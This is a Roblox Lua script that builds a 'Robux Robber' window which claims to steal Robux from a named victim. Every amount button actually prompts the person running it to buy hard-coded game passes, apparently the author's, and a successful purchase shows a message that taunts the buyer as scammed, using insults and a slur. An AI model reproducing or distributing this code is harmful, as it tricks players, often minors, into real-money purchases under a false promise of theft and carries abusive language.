-- made by me dont skid >:(


local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local TextLabel = Instance.new("TextLabel")
local TextButton = Instance.new("TextButton")
local Frame_2 = Instance.new("Frame")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")
local TextBox = Instance.new("TextBox")
local TextButton_2 = Instance.new("TextButton")
local TextButton_3 = Instance.new("TextButton")
local TextButton_4 = Instance.new("TextButton")
local TextButton_5 = Instance.new("TextButton")
local TextButton_6 = Instance.new("TextButton")
local TextButton_7 = Instance.new("TextButton")
local PurchaseSuccessFrame = Instance.new("Frame")
local TextLabel_4 = Instance.new("TextLabel")
local ImageLabel = Instance.new("ImageLabel")
local TextLabel_5 = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(76, 76, 76)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.234295428, 0, 0.213292107, 0)
Frame.Size = UDim2.new(0, 431, 0, 216)

UICorner.Parent = Frame

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.0601160899, 0, -0.00430050585, 0)
TextLabel.Size = UDim2.new(0, 354, 0, 40)
TextLabel.Font = Enum.Font.Fondamento
TextLabel.Text = "Robux Robber"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton.BorderSizePixel = 0
TextButton.Position = UDim2.new(0.827272892, 0, 0.00876688119, 0)
TextButton.Size = UDim2.new(0, 34, 0, 34)
TextButton.Font = Enum.Font.SourceSans
TextButton.Text = "Info"
TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton.TextScaled = true
TextButton.TextSize = 100.000
TextButton.TextWrapped = true

Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
Frame_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(-0.189277098, 0, -0.115010016, 0)
Frame_2.Size = UDim2.new(0, 329, 0, 303)
Frame_2.Visible = false

TextLabel_2.Parent = Frame_2
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.BorderSizePixel = 0
TextLabel_2.Size = UDim2.new(0, 329, 0, 52)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "Info about Robux Robber!"
TextLabel_2.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

TextLabel_3.Parent = Frame_2
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.BorderSizePixel = 0
TextLabel_3.Position = UDim2.new(0.0668693036, 0, 0.20792079, 0)
TextLabel_3.Size = UDim2.new(0, 274, 0, 231)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "Robux Robber is a pls donate script to steal robux! First on the large option of numbers pick the amount of robux. YOU MUST HAVE THE AMOUNT OF ROBUX OR IT WILL NOT WORK for example if you have 127 robux you would pick 100, then input the user name of who you want to steal robux after that you should get a dono an yeah!"
TextLabel_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextWrapped = true

TextBox.Parent = Frame
TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextBox.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextBox.BorderSizePixel = 0
TextBox.Position = UDim2.new(0.266821355, 0, 0.712962985, 0)
TextBox.Size = UDim2.new(0, 200, 0, 50)
TextBox.Font = Enum.Font.SourceSans
TextBox.Text = "Enter victim user here"
TextBox.TextColor3 = Color3.fromRGB(0, 0, 0)
TextBox.TextScaled = true
TextBox.TextSize = 14.000
TextBox.TextWrapped = true

TextButton_2.Parent = Frame
TextButton_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_2.BorderSizePixel = 0
TextButton_2.Position = UDim2.new(0.380252421, 0, 0.215775102, 0)
TextButton_2.Size = UDim2.new(0, 124, 0, 36)
TextButton_2.Font = Enum.Font.SourceSans
TextButton_2.Text = "100"
TextButton_2.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_2.TextSize = 14.000

TextButton_3.Parent = Frame
TextButton_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_3.BorderSizePixel = 0
TextButton_3.Position = UDim2.new(0.0587265119, 0, 0.215775102, 0)
TextButton_3.Size = UDim2.new(0, 124, 0, 36)
TextButton_3.Font = Enum.Font.SourceSans
TextButton_3.Text = "10"
TextButton_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_3.TextSize = 14.000

TextButton_4.Parent = Frame
TextButton_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_4.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_4.BorderSizePixel = 0
TextButton_4.Position = UDim2.new(0.0587265119, 0, 0.456723332, 0)
TextButton_4.Size = UDim2.new(0, 124, 0, 36)
TextButton_4.Font = Enum.Font.SourceSans
TextButton_4.Text = "1000"
TextButton_4.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_4.TextSize = 14.000

TextButton_5.Parent = Frame
TextButton_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_5.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_5.BorderSizePixel = 0
TextButton_5.Position = UDim2.new(0.699825585, 0, 0.215775102, 0)
TextButton_5.Size = UDim2.new(0, 124, 0, 36)
TextButton_5.Font = Enum.Font.SourceSans
TextButton_5.Text = "200"
TextButton_5.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_5.TextSize = 14.000

TextButton_6.Parent = Frame
TextButton_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_6.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_6.BorderSizePixel = 0
TextButton_6.Position = UDim2.new(0.699825585, 0, 0.456723332, 0)
TextButton_6.Size = UDim2.new(0, 124, 0, 36)
TextButton_6.Font = Enum.Font.SourceSans
TextButton_6.Text = "3000"
TextButton_6.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_6.TextSize = 14.000

TextButton_7.Parent = Frame
TextButton_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_7.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_7.BorderSizePixel = 0
TextButton_7.Position = UDim2.new(0.380252421, 0, 0.456723332, 0)
TextButton_7.Size = UDim2.new(0, 124, 0, 36)
TextButton_7.Font = Enum.Font.SourceSans
TextButton_7.Text = "2000"
TextButton_7.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_7.TextSize = 14.000

PurchaseSuccessFrame.Name = "PurchaseSuccessFrame"
PurchaseSuccessFrame.Parent = Frame
PurchaseSuccessFrame.BackgroundColor3 = Color3.fromRGB(61, 61, 61)
PurchaseSuccessFrame.BorderColor3 = Color3.fromRGB(0, 0, 0)
PurchaseSuccessFrame.BorderSizePixel = 0
PurchaseSuccessFrame.Position = UDim2.new(-0.426914155, 0, -0.42592594, 0)
PurchaseSuccessFrame.Size = UDim2.new(0, 785, 0, 431)
PurchaseSuccessFrame.Visible = false

TextLabel_4.Parent = PurchaseSuccessFrame
TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_4.BorderSizePixel = 0
TextLabel_4.Position = UDim2.new(0.416560501, 0, 0.0812064931, 0)
TextLabel_4.Size = UDim2.new(0, 375, 0, 360)
TextLabel_4.Font = Enum.Font.SourceSans
TextLabel_4.Text = "Hello you stupid nerd, you have been scammed out of your robux for scamming people you absoulute degen, your robux will not come back as it is in my bank, DO NOT EVER try scamming and do something more productive with your awful life and go make friends you stupid retard, you are bitch made and deserve nothing. in a minute you will be kicked..."
TextLabel_4.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_4.TextScaled = true
TextLabel_4.TextSize = 14.000
TextLabel_4.TextWrapped = true

ImageLabel.Parent = PurchaseSuccessFrame
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
ImageLabel.BorderSizePixel = 0
ImageLabel.Position = UDim2.new(0.0331210196, 0, 0.299303949, 0)
ImageLabel.Size = UDim2.new(0, 247, 0, 227)
ImageLabel.Image = "http://www.roblox.com/asset/?id=15436686119"

TextLabel_5.Parent = PurchaseSuccessFrame
TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_5.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_5.BorderSizePixel = 0
TextLabel_5.Position = UDim2.new(0.0624203831, 0, 0.0812064931, 0)
TextLabel_5.Size = UDim2.new(0, 250, 0, 69)
TextLabel_5.Font = Enum.Font.SourceSans
TextLabel_5.Text = "YOU HAVE BEEN SCAMMED BY THE LOSER LOGGER!"
TextLabel_5.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_5.TextScaled = true
TextLabel_5.TextSize = 14.000
TextLabel_5.TextWrapped = true

-- Scripts:

local function CEVRJVE_fake_script() -- TextButton.LocalScript 
	local script = Instance.new('LocalScript', TextButton)

	local Button = script.Parent
	Frame = script.Parent.Parent.Frame
	
	function onClick()
		if Frame.Visible == false then
			Frame.Visible = true
	
		elseif Frame.Visible == true then
			Frame.Visible = false
	
		end
	end
	
	Button.MouseButton1Click:connect(onClick)
	
end
coroutine.wrap(CEVRJVE_fake_script)()
local function NFNL_fake_script() -- TextButton_2.LocalScript 
	local script = Instance.new('LocalScript', TextButton_2)

	-- Services
	local MarketplaceService = game:GetService("MarketplaceService")
	local player = game.Players.LocalPlayer
	
	-- Configuration
	local gamePassId = 126032191267219 -- Replace with your Game Pass ID
	local button = script.Parent -- Reference to the button
	local frame = script.Parent.Parent.PurchaseSuccessFrame -- Reference to the frame to show after purchase
	
	-- Ensure the frame is hidden initially
	frame.Visible = false
	
	-- Function to prompt the game pass purchase
	local function promptPurchase()
	    if player and player.UserId then
	        MarketplaceService:PromptGamePassPurchase(player, gamePassId)
	    else
	        warn("Player not found or invalid UserId")
	    end
	end
	
	-- Function to handle purchase completion
	local function onPurchaseFinished(playerId, purchasedGamePassId, wasPurchased)
	    if playerId == player.UserId and purchasedGamePassId == gamePassId and wasPurchased then
	        -- Show the frame after a successful purchase
	        frame.Visible = true
	    end
	end
	
	-- Connect the button click to the promptPurchase function
	button.MouseButton1Click:Connect(promptPurchase)
	
	-- Connect the purchase completion event
	MarketplaceService.PromptGamePassPurchaseFinished:Connect(onPurchaseFinished)
	
end
coroutine.wrap(NFNL_fake_script)()
local function BTVLRRB_fake_script() -- TextButton_3.LocalScript 
	local script = Instance.new('LocalScript', TextButton_3)

	-- Services
	local MarketplaceService = game:GetService("MarketplaceService")
	local player = game.Players.LocalPlayer
	
	-- Configuration
	local gamePassId = 13600173502 -- Replace with your Game Pass ID
	local button = script.Parent -- Reference to the button
	local frame = script.Parent.Parent.PurchaseSuccessFrame -- Reference to the frame to show after purchase
	
	-- Ensure the frame is hidden initially
	frame.Visible = false
	
	-- Function to prompt the game pass purchase
	local function promptPurchase()
	    if player and player.UserId then
	        MarketplaceService:PromptGamePassPurchase(player, gamePassId)
	    else
	        warn("Player not found or invalid UserId")
	    end
	end
	
	-- Function to handle purchase completion
	local function onPurchaseFinished(playerId, purchasedGamePassId, wasPurchased)
	    if playerId == player.UserId and purchasedGamePassId == gamePassId and wasPurchased then
	        -- Show the frame after a successful purchase
	        frame.Visible = true
	    end
	end
	
	-- Connect the button click to the promptPurchase function
	button.MouseButton1Click:Connect(promptPurchase)
	
	-- Connect the purchase completion event
	MarketplaceService.PromptGamePassPurchaseFinished:Connect(onPurchaseFinished)
	
end
coroutine.wrap(BTVLRRB_fake_script)()
local function RCOZ_fake_script() -- TextButton_4.LocalScript 
	local script = Instance.new('LocalScript', TextButton_4)

	-- Services
	local MarketplaceService = game:GetService("MarketplaceService")
	local player = game.Players.LocalPlayer
	
	-- Configuration
	local gamePassId = 88420491396767 -- Replace with your Game Pass ID
	local button = script.Parent -- Reference to the button
	local frame = script.Parent.Parent.PurchaseSuccessFrame -- Reference to the frame to show after purchase
	
	-- Ensure the frame is hidden initially
	frame.Visible = false
	
	-- Function to prompt the game pass purchase
	local function promptPurchase()
	    if player and player.UserId then
	        MarketplaceService:PromptGamePassPurchase(player, gamePassId)
	    else
	        warn("Player not found or invalid UserId")
	    end
	end
	
	-- Function to handle purchase completion
	local function onPurchaseFinished(playerId, purchasedGamePassId, wasPurchased)
	    if playerId == player.UserId and purchasedGamePassId == gamePassId and wasPurchased then
	        -- Show the frame after a successful purchase
	        frame.Visible = true
	    end
	end
	
	-- Connect the button click to the promptPurchase function
	button.MouseButton1Click:Connect(promptPurchase)
	
	-- Connect the purchase completion event
	MarketplaceService.PromptGamePassPurchaseFinished:Connect(onPurchaseFinished)
	
end
coroutine.wrap(RCOZ_fake_script)()
local function CGCRMWZ_fake_script() -- TextButton_5.LocalScript 
	local script = Instance.new('LocalScript', TextButton_5)

	-- Services
	local MarketplaceService = game:GetService("MarketplaceService")
	local player = game.Players.LocalPlayer
	
	-- Configuration
	local gamePassId = 13600173502 -- Replace with your Game Pass ID
	local button = script.Parent -- Reference to the button
	local frame = script.Parent.Parent.PurchaseSuccessFrame -- Reference to the frame to show after purchase
	
	-- Ensure the frame is hidden initially
	frame.Visible = false
	
	-- Function to prompt the game pass purchase
	local function promptPurchase()
	    if player and player.UserId then
	        MarketplaceService:PromptGamePassPurchase(player, gamePassId)
	    else
	        warn("Player not found or invalid UserId")
	    end
	end
	
	-- Function to handle purchase completion
	local function onPurchaseFinished(playerId, purchasedGamePassId, wasPurchased)
	    if playerId == player.UserId and purchasedGamePassId == gamePassId and wasPurchased then
	        -- Show the frame after a successful purchase
	        frame.Visible = true
	    end
	end
	
	-- Connect the button click to the promptPurchase function
	button.MouseButton1Click:Connect(promptPurchase)
	
	-- Connect the purchase completion event
	MarketplaceService.PromptGamePassPurchaseFinished:Connect(onPurchaseFinished)
	
end
coroutine.wrap(CGCRMWZ_fake_script)()
local function JYXH_fake_script() -- TextButton_6.LocalScript 
	local script = Instance.new('LocalScript', TextButton_6)

	-- Services
	local MarketplaceService = game:GetService("MarketplaceService")
	local player = game.Players.LocalPlayer
	
	-- Configuration
	local gamePassId = 13600173502 -- Replace with your Game Pass ID
	local button = script.Parent -- Reference to the button
	local frame = script.Parent.Parent.PurchaseSuccessFrame -- Reference to the frame to show after purchase
	
	-- Ensure the frame is hidden initially
	frame.Visible = false
	
	-- Function to prompt the game pass purchase
	local function promptPurchase()
	    if player and player.UserId then
	        MarketplaceService:PromptGamePassPurchase(player, gamePassId)
	    else
	        warn("Player not found or invalid UserId")
	    end
	end
	
	-- Function to handle purchase completion
	local function onPurchaseFinished(playerId, purchasedGamePassId, wasPurchased)
	    if playerId == player.UserId and purchasedGamePassId == gamePassId and wasPurchased then
	        -- Show the frame after a successful purchase
	        frame.Visible = true
	    end
	end
	
	-- Connect the button click to the promptPurchase function
	button.MouseButton1Click:Connect(promptPurchase)
	
	-- Connect the purchase completion event
	MarketplaceService.PromptGamePassPurchaseFinished:Connect(onPurchaseFinished)
	
end
coroutine.wrap(JYXH_fake_script)()
local function HGVA_fake_script() -- TextButton_7.LocalScript 
	local script = Instance.new('LocalScript', TextButton_7)

	-- Services
	local MarketplaceService = game:GetService("MarketplaceService")
	local player = game.Players.LocalPlayer
	
	-- Configuration
	local gamePassId = 1025261960 -- Replace with your Game Pass ID
	local button = script.Parent -- Reference to the button
	local frame = script.Parent.Parent.PurchaseSuccessFrame -- Reference to the frame to show after purchase
	
	-- Ensure the frame is hidden initially
	frame.Visible = false
	
	-- Function to prompt the game pass purchase
	local function promptPurchase()
	    if player and player.UserId then
	        MarketplaceService:PromptGamePassPurchase(player, gamePassId)
	    else
	        warn("Player not found or invalid UserId")
	    end
	end
	
	-- Function to handle purchase completion
	local function onPurchaseFinished(playerId, purchasedGamePassId, wasPurchased)
	    if playerId == player.UserId and purchasedGamePassId == gamePassId and wasPurchased then
	        -- Show the frame after a successful purchase
	        frame.Visible = true
	    end
	end
	
	-- Connect the button click to the promptPurchase function
	button.MouseButton1Click:Connect(promptPurchase)
	
	-- Connect the purchase completion event
	MarketplaceService.PromptGamePassPurchaseFinished:Connect(onPurchaseFinished)
	
end
coroutine.wrap(HGVA_fake_script)()
local function ICEGV_fake_script() -- Frame.Drag 
	local script = Instance.new('LocalScript', Frame)

	local UserInputService = game:GetService("UserInputService")
	
	local gui = script.Parent
	
	local dragging
	local dragInput
	local dragStart
	local startPos
	
	local function update(input)
		local delta = input.Position - dragStart
		gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
	end
	
	gui.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = gui.Position
			
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)
	
	gui.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			dragInput = input
		end
	end)
	
	UserInputService.InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			update(input)
		end
	end)
end
coroutine.wrap(ICEGV_fake_script)()
local function GARJ_fake_script() -- Frame.DragMob 
	local script = Instance.new('LocalScript', Frame)

	local frame = script.Parent
	
	-- Variables to track dragging state
	local dragging = false
	local dragStart = nil
	local startPos = nil
	
	-- Function to handle input beginning (when the user starts dragging)
	local function onInputBegan(input)
	    if input.UserInputType == Enum.UserInputType.Touch or input.UserInputType == Enum.UserInputType.MouseButton1 then
	        dragging = true
	        dragStart = input.Position
	        startPos = frame.Position
	    end
	end
	
	-- Function to handle input changes (when the user moves their finger/mouse)
	local function onInputChanged(input)
	    if dragging and input.UserInputType == Enum.UserInputType.Touch or input.UserInputType == Enum.UserInputType.MouseMovement then
	        local delta = input.Position - dragStart
	        frame.Position = UDim2.new(
	            startPos.X.Scale,
	            startPos.X.Offset + delta.X,
	            startPos.Y.Scale,
	            startPos.Y.Offset + delta.Y
	        )
	    end
	end
	
	-- Function to handle input ending (when the user releases their touch/mouse)
	local function onInputEnded(input)
	    if input.UserInputType == Enum.UserInputType.Touch or input.UserInputType == Enum.UserInputType.MouseButton1 then
	        dragging = false
	    end
	end
	
	-- Connect input events
	frame.InputBegan:Connect(onInputBegan)
	frame.InputChanged:Connect(onInputChanged)
	frame.InputEnded:Connect(onInputEnded)
	
end
coroutine.wrap(GARJ_fake_script)()
